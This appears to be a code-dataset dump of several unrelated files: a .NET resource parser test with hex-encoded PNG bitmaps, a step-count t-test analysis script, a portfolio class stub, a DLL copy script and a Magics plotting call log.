        'B6D5559867C9AB8585E06B6EE63A3E3FCF3DAC8DB26764CAE58290E8E8FB0C6188D7351A44B5' # ..U.g.....kn.:>?.=...gd........a..5.D.
        'EFF5C2CEE121D8F3F3E1AF46C375CEE1E01ED6BECECC7026575680CA64F50C21A054AF47D4BB' # .....!.....F.u........p&WV..d..!.T.G..
        '2727E0DEDB83A5DC5CF03636729DB6DBB987B511AB95635A5A02B60175708DCA9616A4DE737C' # ''......\.66r.........cZZ...up......s|
        '0CEB6CBAB6EC6CF0363470B5B2DBD0C3DAD0E424676C6101487C7C034308286C6A426EBAD994' # ..l...l.64p........$gla.H||.C.(ljBn...
        '1D5B5B309B9101A76A3557DC027A581B349938DF666781B0153284806B7575C8ED8D83035876' # .[[0....j5W..zX.4.8.fg...2..kuu.....Xv
        'BBC19A960627B5B55CCDEC73D1C3DAC0F838E7CBD4149098182D4308482B2F47EEACEDEF836D' # .....'..\..s.....8.......-C.H+/G.....m
        '6383AFEFB8AA8AAB6971917B58EB1F1DE5E07F40A2A35B1942404C410172F7371B94930D6C58' # c.......iq.{X......@..[.B@LA.r.7....lX
        '2A056F4D0D570B1B227A58FB64367370903432B2932104885353C94585A2262C39F9216260FF' # *.oM.W.."zX.d6sp.42..!..SS.E..&,9.!b`.
        '7B8080875C484CEC0C8D8D35844444BCA2128996C10280FC03EF855F8FAC5638160000000049' # {...\HL....5.DD............_..V8.....I
        '454E44AE4260820B400001000000FFFFFFFF01000000000000000C020000005153797374656D' # END.B`..@......................QSystem
        '2E44726177696E672C2056657273696F6E3D322E302E302E302C2043756C747572653D6E6575' # .Drawing,.Version=2.0.0.0,.Culture=neu
        '7472616C2C205075626C69634B6579546F6B656E3D6230336635663766313164353061336105' # tral,.PublicKeyToken=b03f5f7f11d50a3a.
        '010000001553797374656D2E44726177696E672E4269746D6170010000000444617461070202' # .....System.Drawing.Bitmap.....Data...
        '00000009030000000F03000000760200000289504E470D0A1A0A0000000D4948445200000010' # .............v.....PNG........IHDR....
        '0000001008060000001FF3FF610000000467414D410000B18F0BFC6105000000206348524D00' # ............a....gAMA......a.....cHRM.
        '007A26000080840000FA00000080E8000075300000EA6000003A98000017709CBA513C000002' # .z&..............u0...`..:....p..Q<...
        '0149444154384FA590BF4B1B611CC6DF9021901F902C596A42290952128B5C4072ED10102434' # .IDAT8O...K.a....!...,YjB).R..\@r...$4
        '9721BFFE814CA5482721A06807414470B0984E2E0AADBB92A9A90A1A4EC8051273A1511A6D1A' # .!...L.H'!.h.ADp..N.........N...s.Q.m.
        '2E2AD94321CBD7F739CC11D1C90ECFBD0FCFF7F33CC33122FA2FE99F582CC6E2F1384B26932C' # .*.C!...9...........<.1"./..X,...8K&.,
        '954AE96F269311B93EDC4B1CBD8145E7D140229178CB818FFC7D8177301850BFDFA7D10CCC93' # .J.o&...>.K...E..@".x....}.w0.P.......
        '039224BDCBE5721BBD5E8FB2D9EC028766AFAFBB04C123C30D0CD80703D16814FAD46EB74951' # ..$...r..^......f.....#.......h...n.IQ
        'CAD4ED6A5428147E6B9A46107CABD5D26F60C0A2630C88A2C82291C8583A9DFE7C7656A35AAD' # ...jT(.~k.F.|...o`..c...."..X:..|vV.Z.
        '4A575797D4E9FCD5058F0C373060D13106C2E170840773D0CECE76ABD1506977F77B33180C7E' # JWW........70`.1...p..s...v..Piw.{3..~
        '85E091E136E4D031060441C8552A0A1D1D1DD2E9A94CF57A9D2626DEAC9ACD6606C123C30D0C' # ....6..1..A.U*.......L.z.&&....f..#...
        '58748C814020305F2A95A8582C125E55FD459393C2B2C96462103CB251061D63C0EFF7CFF87C' # Xt..@.0_*..X,.^U.E.....db.<.Q..c.....|
        'BE45687333FFA75A6DD0FEFECF6A2834B504C123C36DC8A1630C78BD5EE6F1785E0A42685D96' # .Ehs3..Zm....j(4...#.m..c.x.^..x^.Bh].
        '2B7470704217171ADDDEFED3058F0C373060D13106DC6E37B42CCB35DADBFB41C7C715CAE7B7' # +tppB..........70`.1..n7.,.5...A......
        'DAE57283207864B881018B8E31E072B9A0F7D3D333DF14E59CC6C75F7F713A9D2BB2ACF2824A' # ..r..xd.....1.r.....3......_.q:.+....J
        'F0C8700303169D07031C6276BB3D66B3D9561D0EC72BBCCDE60DFFA11D1ACDC0807D728003CC' # ..p.......bv.=f..V...+...........}r...
        '6AB5EAB2582C12D7DABDA4610EE6D1C0F345EC0E5F6D13DFD7F80D2E0000000049454E44AE42' # j...X,.....a.....E.._m..........IEND.B
        '60820B' # `..
    )
    # Exercise the parser and verify every entry in the name table was
    # surfaced (eleven "contextmenu_*.Image" names appear above).
    parsed = NetManifestResource(StreamReader(manifest))
    self.assertEqual(len(parsed.Resources), 11)
def test_guid_formatter(self):
guid_text = 'AAAAAAAA-BBBB-CCCC-DDDD-EEEEEEEEEEEE'
guid = StringGUID(StreamReader(b'\xAA\xAA\xAA\xAA\xBB\xBB\xCC\xCC\xDD\xDD\xEE\xEE\xEE\xEE\xEE\xEE'))
self.assertEqual(str(guid), guid_text)
| 122.702312
| 132
| 0.674031
| 2,480
| 42,455
| 11.517339
| 0.315323
| 0.002381
| 0.001786
| 0.002381
| 0.132094
| 0.130589
| 0.127158
| 0.121801
| 0.120996
| 0.114729
| 0
| 0.48118
| 0.12578
| 42,455
| 345
| 133
| 123.057971
| 0.288401
| 0.283382
| 0
| 0.10119
| 0
| 0.002976
| 0.781822
| 0.781623
| 0
| 1
| 0.000166
| 0
| 0.014881
| 1
| 0.011905
| false
| 0
| 0.011905
| 0
| 0.026786
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4920ccd277b01e335dc6496cd45b9c4f0971db50
| 33,762
|
py
|
Python
|
Data_analysis_code.py
|
przwrobel/IER
|
4561ae68719928e764b07900d78501d470a6b5a6
|
[
"CC-BY-4.0"
] | null | null | null |
Data_analysis_code.py
|
przwrobel/IER
|
4561ae68719928e764b07900d78501d470a6b5a6
|
[
"CC-BY-4.0"
] | null | null | null |
Data_analysis_code.py
|
przwrobel/IER
|
4561ae68719928e764b07900d78501d470a6b5a6
|
[
"CC-BY-4.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Sat May 8 18:22:37 2021
@author: user
"""
import os

import pandas as pd
import scipy
import scipy.stats  # explicit: 'import scipy' alone does not guarantee scipy.stats is loaded

from tableone import TableOne, load_dataset
#READING DATA
# BUGFIX: the path was built as os.getcwd() + '\Data_IER.csv'.  '\D' is an
# invalid escape sequence (a SyntaxWarning on modern Python) and the
# hard-coded backslash only works on Windows.  os.path.join produces the
# same path on Windows and a correct one elsewhere.
path = os.path.join(os.getcwd(), 'Data_IER.csv')
# cp1252 encoding kept as-is; presumably the CSV was exported from a
# Windows tool -- confirm against the data source.
data = pd.read_csv(path, encoding='cp1252')
#SORTING INTO RELEVANT CATEGORIES
def _subset(frame, column, value):
    """Return the rows of *frame* whose *column* equals *value*."""
    return frame[frame[column].isin([value])]

# Split the raw data by survey year, then split each year by gender.
participants_2019 = _subset(data, 'year', 2019)
participants_2019_male = _subset(participants_2019, 'gender', 'Male')
participants_2019_female = _subset(participants_2019, 'gender', 'Female')
participants_2020 = _subset(data, 'year', 2020)
participants_2020_male = _subset(participants_2020, 'gender', 'Male')
participants_2020_female = _subset(participants_2020, 'gender', 'Female')
#CREATING TABLE ONE
# Build a descriptive "Table 1" for each study year, stratified by gender,
# using the third-party `tableone` package, and print it in LaTeX format.
# Variables summarised: gender, bmi and living situation; 'living' is
# declared categorical so it is tabulated as counts/percentages.
columns = ['gender','bmi','living']
categorical = ['living']
groupby = 'gender'
mytable = TableOne(participants_2019 , columns=columns, categorical=categorical, groupby=groupby)
print(mytable.tabulate(tablefmt="latex"))
mytable_2 = TableOne(participants_2020 , columns=columns, categorical=categorical, groupby=groupby)
print(mytable_2.tabulate(tablefmt="latex"))
#FILTERING NECESSARY DATA AND CALCULATING WEEKEND/WEEKDAY AVERAGES
# Diary columns 1,2,5,6,7 are weekdays and 3,4 the weekend, for both the
# smartphone app ('stap_app_*_aantal') and the Omron device
# ('stap_om_*_aantal') -- inferred from the weekday/weekend split below.

def _daily_average(frame, week_cols, keep_cols):
    """Return *keep_cols* of the rows of *frame* that have a complete week
    of step counts in *week_cols*, with an extra 'avg' column holding the
    row-wise mean of *keep_cols*.

    BUGFIX: the original filtered with .isin(['nan']), which never matches
    a float NaN, so incomplete rows were silently kept; .isna() implements
    the intended complete-case filter.  .copy() avoids pandas'
    SettingWithCopyWarning when the 'avg' column is added.
    """
    complete = frame[~frame[week_cols].isna().any(axis=1)]
    subset = complete[keep_cols].copy()
    subset['avg'] = subset.mean(axis=1)
    return subset

# Column lists; the weekday order matches the original code (mean is
# order-independent).
_app_week = ['stap_app_%d_aantal' % i for i in range(1, 8)]
_app_weekdays = ['stap_app_1_aantal', 'stap_app_2_aantal', 'stap_app_6_aantal',
                 'stap_app_7_aantal', 'stap_app_5_aantal']
_app_weekends = ['stap_app_3_aantal', 'stap_app_4_aantal']
_om_week = [c.replace('_app_', '_om_') for c in _app_week]
_om_weekdays = [c.replace('_app_', '_om_') for c in _app_weekdays]
_om_weekends = [c.replace('_app_', '_om_') for c in _app_weekends]

# App, weekdays (overall / male / female, 2019 and 2020)
participants_2019_weekdays_app = _daily_average(participants_2019, _app_week, _app_weekdays)
participants_2020_weekdays_app = _daily_average(participants_2020, _app_week, _app_weekdays)
participants_2019_male_weekdays_app = _daily_average(participants_2019_male, _app_week, _app_weekdays)
participants_2019_female_weekdays_app = _daily_average(participants_2019_female, _app_week, _app_weekdays)
participants_2020_male_weekdays_app = _daily_average(participants_2020_male, _app_week, _app_weekdays)
participants_2020_female_weekdays_app = _daily_average(participants_2020_female, _app_week, _app_weekdays)
# App, weekends
participants_2019_weekends_app = _daily_average(participants_2019, _app_week, _app_weekends)
participants_2020_weekends_app = _daily_average(participants_2020, _app_week, _app_weekends)
participants_2019_male_weekends_app = _daily_average(participants_2019_male, _app_week, _app_weekends)
participants_2019_female_weekends_app = _daily_average(participants_2019_female, _app_week, _app_weekends)
participants_2020_male_weekends_app = _daily_average(participants_2020_male, _app_week, _app_weekends)
participants_2020_female_weekends_app = _daily_average(participants_2020_female, _app_week, _app_weekends)
# Omron, weekdays
participants_2019_weekdays_om = _daily_average(participants_2019, _om_week, _om_weekdays)
participants_2020_weekdays_om = _daily_average(participants_2020, _om_week, _om_weekdays)
participants_2019_male_weekdays_om = _daily_average(participants_2019_male, _om_week, _om_weekdays)
participants_2019_female_weekdays_om = _daily_average(participants_2019_female, _om_week, _om_weekdays)
participants_2020_male_weekdays_om = _daily_average(participants_2020_male, _om_week, _om_weekdays)
participants_2020_female_weekdays_om = _daily_average(participants_2020_female, _om_week, _om_weekdays)
# Omron, weekends
participants_2019_weekends_om = _daily_average(participants_2019, _om_week, _om_weekends)
participants_2020_weekends_om = _daily_average(participants_2020, _om_week, _om_weekends)
participants_2019_male_weekends_om = _daily_average(participants_2019_male, _om_week, _om_weekends)
participants_2019_female_weekends_om = _daily_average(participants_2019_female, _om_week, _om_weekends)
participants_2020_male_weekends_om = _daily_average(participants_2020_male, _om_week, _om_weekends)
participants_2020_female_weekends_om = _daily_average(participants_2020_female, _om_week, _om_weekends)
###################################################
#UNPAIRED T-TESTS (RESULTS ARE WRITTEN TO "results.txt")
f = open("results.txt", "w")

def _write_welch(out, title, label_a, series_a, label_b, series_b):
    """Run Welch's unpaired t-test between *series_a* and *series_b* and
    write the result plus the means and standard deviations of both
    samples to *out*, byte-for-byte in the original report format."""
    out.write(title + " \n")
    # equal_var=False selects Welch's test (unequal variances).
    out.write(str(scipy.stats.ttest_ind(series_a, series_b, axis=0, equal_var=False)))
    out.write("\n")
    out.write("mean_" + label_a + "=")
    out.write(str(series_a.mean(axis=0)))
    out.write("\n")
    out.write("mean_" + label_b + "=")
    out.write(str(series_b.mean(axis=0)))
    out.write("\n")
    out.write("stdev_" + label_a + "=")
    out.write(str(series_a.std(axis=0)))
    out.write("\n")
    out.write("stdev_" + label_b + "=")
    out.write(str(series_b.std(axis=0)))
    out.write("\n \n")

# 2019 vs 2020 comparisons: overall, then male, then female, each for
# weekday/weekend averages on app and Omron (same order as the original
# copy-pasted sections, so results.txt is unchanged).
_year_comparisons = [
    ("Overall weekdays app", participants_2019_weekdays_app, participants_2020_weekdays_app),
    ("Overall weekdays Omron", participants_2019_weekdays_om, participants_2020_weekdays_om),
    ("Overall weekends app", participants_2019_weekends_app, participants_2020_weekends_app),
    ("Overall weekends Omron", participants_2019_weekends_om, participants_2020_weekends_om),
    ("Male weekdays app", participants_2019_male_weekdays_app, participants_2020_male_weekdays_app),
    ("Male weekdays Omron", participants_2019_male_weekdays_om, participants_2020_male_weekdays_om),
    ("Male weekends app", participants_2019_male_weekends_app, participants_2020_male_weekends_app),
    ("Male weekends Omron", participants_2019_male_weekends_om, participants_2020_male_weekends_om),
    ("Female weekdays app", participants_2019_female_weekdays_app, participants_2020_female_weekdays_app),
    ("Female weekdays Omron", participants_2019_female_weekdays_om, participants_2020_female_weekdays_om),
    ("Female weekends app", participants_2019_female_weekends_app, participants_2020_female_weekends_app),
    ("Female weekends Omron", participants_2019_female_weekends_om, participants_2020_female_weekends_om),
]
for _title, _df_2019, _df_2020 in _year_comparisons:
    _write_welch(f, _title, "2019", _df_2019['avg'], "2020", _df_2020['avg'])
#########################################
#INTERNAL TESTS
#########################################

def _write_welch_female_male(out, title, series_female, series_male):
    """Welch's unpaired t-test of female vs male averages; writes the
    test result plus both means and standard deviations to *out*,
    byte-for-byte in the original report format."""
    out.write(title + " \n")
    out.write(str(scipy.stats.ttest_ind(series_female, series_male, axis=0, equal_var=False)))
    out.write("\n")
    out.write("mean_female=")
    out.write(str(series_female.mean(axis=0)))
    out.write("\n")
    out.write("mean_male=")
    out.write(str(series_male.mean(axis=0)))
    out.write("\n")
    out.write("stdev_female=")
    out.write(str(series_female.std(axis=0)))
    out.write("\n")
    out.write("stdev_male=")
    out.write(str(series_male.std(axis=0)))
    out.write("\n \n")

# Within-year female-vs-male comparisons, in the original section order.
_internal_comparisons = [
    ("Internal weekdays app 2019", participants_2019_female_weekdays_app, participants_2019_male_weekdays_app),
    ("Internal weekdays Omron 2019", participants_2019_female_weekdays_om, participants_2019_male_weekdays_om),
    ("Internal weekdays app 2020", participants_2020_female_weekdays_app, participants_2020_male_weekdays_app),
    ("Internal weekdays Omron 2020", participants_2020_female_weekdays_om, participants_2020_male_weekdays_om),
    ("Internal weekends app 2019", participants_2019_female_weekends_app, participants_2019_male_weekends_app),
    ("Internal weekends Omron 2019", participants_2019_female_weekends_om, participants_2019_male_weekends_om),
    ("Internal weekends app 2020", participants_2020_female_weekends_app, participants_2020_male_weekends_app),
    ("Internal weekends Omron 2020", participants_2020_female_weekends_om, participants_2020_male_weekends_om),
]
for _title, _df_female, _df_male in _internal_comparisons:
    _write_welch_female_male(f, _title, _df_female['avg'], _df_male['avg'])
#########################################
#WEEKDAY VS WEEKEND
#########################################

def _write_paired(out, title, series_weekdays, series_weekends):
    """Paired t-test of weekday vs weekend averages for the same
    participants; writes the result plus both means and standard
    deviations to *out*, byte-for-byte in the original report format.
    The two series come from the same filtered rows, so they are aligned
    as ttest_rel requires."""
    out.write(title + " \n")
    out.write(str(scipy.stats.ttest_rel(series_weekdays, series_weekends, axis=0)))
    out.write("\n")
    out.write("mean_weekdays=")
    out.write(str(series_weekdays.mean(axis=0)))
    out.write("\n")
    out.write("mean_weekends=")
    out.write(str(series_weekends.mean(axis=0)))
    out.write("\n")
    out.write("stdev_weekdays=")
    out.write(str(series_weekdays.std(axis=0)))
    out.write("\n")
    out.write("stdev_weekends=")
    out.write(str(series_weekends.std(axis=0)))
    out.write("\n \n")

# Overall weekday-vs-weekend comparisons, in the original section order.
_paired_comparisons = [
    ("Weekend vs weekdays overall app 2019", participants_2019_weekdays_app, participants_2019_weekends_app),
    ("Weekend vs weekdays overall Omron 2019", participants_2019_weekdays_om, participants_2019_weekends_om),
    ("Weekend vs weekdays overall app 2020", participants_2020_weekdays_app, participants_2020_weekends_app),
]
for _title, _df_weekdays, _df_weekends in _paired_comparisons:
    _write_paired(f, _title, _df_weekdays['avg'], _df_weekends['avg'])
f.write("Weekend vs weekdays overall Omron 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_weekdays_om['avg'],participants_2020_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males app 2019 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_male_weekdays_app['avg'],participants_2019_male_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_male_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males Omron 2019\n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_male_weekdays_om['avg'],participants_2019_male_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_male_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males app 2020\n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_male_weekdays_app['avg'],participants_2020_male_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_male_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_male_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_male_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_male_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays males Omron 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_male_weekdays_om['avg'],participants_2020_male_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_male_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_male_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_male_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_male_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females app 2019 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_female_weekdays_app['avg'],participants_2019_female_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_female_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females Omron 2019\n")
temp_test=str(scipy.stats.ttest_rel(participants_2019_female_weekdays_om['avg'],participants_2019_female_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2019_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2019_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2019_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2019_female_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females app 2020\n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_female_weekdays_app['avg'],participants_2020_female_weekends_app['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_female_weekdays_app['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_female_weekends_app['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_female_weekdays_app['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_female_weekends_app['avg'].std(axis=0)))
f.write("\n \n")
f.write("Weekend vs weekdays females Omron 2020 \n")
temp_test=str(scipy.stats.ttest_rel(participants_2020_female_weekdays_om['avg'],participants_2020_female_weekends_om['avg'],axis=0))
f.write(temp_test)
f.write("\n")
f.write("mean_weekdays=")
f.write(str(participants_2020_female_weekdays_om['avg'].mean(axis=0)))
f.write("\n")
f.write("mean_weekends=")
f.write(str(participants_2020_female_weekends_om['avg'].mean(axis=0)))
f.write("\n")
f.write("stdev_weekdays=")
f.write(str(participants_2020_female_weekdays_om['avg'].std(axis=0)))
f.write("\n")
f.write("stdev_weekends=")
f.write(str(participants_2020_female_weekends_om['avg'].std(axis=0)))
f.write("\n \n")
f.close()
| 44.717881
| 227
| 0.769771
| 5,712
| 33,762
| 4.17577
| 0.020133
| 0.120745
| 0.046956
| 0.064565
| 0.971197
| 0.966083
| 0.930404
| 0.88219
| 0.866133
| 0.862527
| 0
| 0.06635
| 0.033085
| 33,762
| 755
| 228
| 44.717881
| 0.664298
| 0.026539
| 0
| 0.750397
| 0
| 0
| 0.24693
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.006359
| 0
| 0.006359
| 0.00318
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
49962efbaf31f4afb3bef2f6e9de1f577614f575
| 155
|
py
|
Python
|
Common/Measures/Portfolio/Timely/PortfolioQuarterly.py
|
enriqueescobar-askida/Kinito.Finance
|
5308748b64829ac798a858161f9b4a9e5829db44
|
[
"MIT"
] | 2
|
2020-03-04T11:18:38.000Z
|
2020-05-10T15:36:42.000Z
|
Common/Measures/Portfolio/Timely/PortfolioQuarterly.py
|
enriqueescobar-askida/Kinito.Finance
|
5308748b64829ac798a858161f9b4a9e5829db44
|
[
"MIT"
] | 6
|
2020-03-30T16:42:47.000Z
|
2021-12-13T20:37:21.000Z
|
Common/Measures/Portfolio/Timely/PortfolioQuarterly.py
|
enriqueescobar-askida/Kinito.Finance
|
5308748b64829ac798a858161f9b4a9e5829db44
|
[
"MIT"
] | 1
|
2020-04-14T11:26:16.000Z
|
2020-04-14T11:26:16.000Z
|
from Common.Measures.Portfolio.Timely.AbstractPortfolioTimely import AbstractPortfolioTimely
class PortfolioQuarterly(AbstractPortfolioTimely):
    """Quarterly portfolio measures.

    Placeholder subclass: all behaviour is inherited unchanged from
    ``AbstractPortfolioTimely``.
    """
| 25.833333
| 92
| 0.870968
| 12
| 155
| 11.25
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083871
| 155
| 5
| 93
| 31
| 0.950704
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
b8ecf181d77f8d2521461f8e8220f30b7a4fc56f
| 914
|
py
|
Python
|
csp_DRL/copy_pre_complied_files.py
|
songwenas12/csp-drl
|
dcc2320b08c397a9561242de4e24b569b71752fa
|
[
"Apache-2.0"
] | 3
|
2021-12-11T12:30:09.000Z
|
2021-12-30T09:49:45.000Z
|
csp_DRL/copy_pre_complied_files.py
|
songwenas12/csp-drl
|
dcc2320b08c397a9561242de4e24b569b71752fa
|
[
"Apache-2.0"
] | null | null | null |
csp_DRL/copy_pre_complied_files.py
|
songwenas12/csp-drl
|
dcc2320b08c397a9561242de4e24b569b71752fa
|
[
"Apache-2.0"
] | null | null | null |
import shutil

# Folder that ships the pre-compiled binaries.
_SRC_DIR = './pre_compiled_libs'
# The static library sits next to the constraint_solver sources,
# while the runtime DLLs go into the generated ortools output tree.
_LIB_DEST = '../or-tools-6.7.2-customized/ortools/constraint_solver'
_DLL_DEST = '../or-tools-6.7.2-customized/ortools/gen/ortools/constraint_solver'

# Copy drlDLL.lib
shutil.copy2(_SRC_DIR + '/drlDLL.lib', _LIB_DEST)

# Copy the dlls (copy2 preserves file metadata such as timestamps).
for _dll in ('drlDLL.dll', 'cublas64_100.dll', 'cudart64_100.dll',
             'cusparse64_100.dll', 'libiomp5md.dll', 'tbb.dll'):
    shutil.copy2(_SRC_DIR + '/' + _dll, _DLL_DEST)

print('Pre-compiled files copied.')
| 65.285714
| 124
| 0.777899
| 140
| 914
| 4.907143
| 0.221429
| 0.128093
| 0.142649
| 0.224163
| 0.823872
| 0.823872
| 0.730713
| 0.691412
| 0.691412
| 0.691412
| 0
| 0.049661
| 0.030635
| 914
| 14
| 125
| 65.285714
| 0.725734
| 0.031729
| 0
| 0
| 0
| 0
| 0.80068
| 0.771234
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.111111
| 0
| 0.111111
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
770805c663d876b8b5b5f27aec24228f38e624e1
| 133,206
|
py
|
Python
|
tools/versioncmp/examples/wmo_timeseries/wmo_timeseries_mslp.mcalls.py
|
dtip/magics
|
3247535760ca962f859c203295b508d442aca4ed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tools/versioncmp/examples/wmo_timeseries/wmo_timeseries_mslp.mcalls.py
|
dtip/magics
|
3247535760ca962f859c203295b508d442aca4ed
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tools/versioncmp/examples/wmo_timeseries/wmo_timeseries_mslp.mcalls.py
|
dtip/magics
|
3247535760ca962f859c203295b508d442aca4ed
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2019-12-18T17:01:56.000Z
|
2019-12-18T17:01:56.000Z
|
# (C) Copyright 1996-2016 ECMWF.
#
# This software is licensed under the terms of the Apache Licence Version 2.0
# which can be obtained at http://www.apache.org/licenses/LICENSE-2.0.
# In applying this licence, ECMWF does not waive the privileges and immunities
# granted to it by virtue of its status as an intergovernmental organisation nor
# does it submit to any jurisdiction.
# Auto-generated dump of recorded Magics API calls (".mcalls" replay
# script) — parameter values and repetitions mirror the original run.
import Magics as mpp
from numpy import *
mpp.init()
# Output device and (non-)map projection for a plain time-series plot.
mpp.setc('output_format','ps')
mpp.setc('output_name','verify')
mpp.setc('subpage_map_projection','none')
mpp.setc('subpage_map_projection','none')
# A4-landscape page geometry (cm).
mpp.setr('page_x_length',29.7)
mpp.setr('page_y_length',21.0)
mpp.setr('super_page_x_length',29.7)
mpp.setc('page_id_line','off')
mpp.setc('page_id_line_user_text','Verify/MetPy devel')
mpp.setc('page_frame','on')
mpp.setr('super_page_y_length',21.0)
mpp.setr('page_x_length',29.7)
mpp.setc('layout','positional')
mpp.setr('page_x_position',0.0)
mpp.setr('page_y_position',0.0)
mpp.setr('page_y_length',21.0)
mpp.setc('page_frame','off')
# Recorded read-backs of the page geometry; the trailing comments give
# the values the original run returned. Repetition is an artefact of
# the call recorder, not meaningful logic.
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
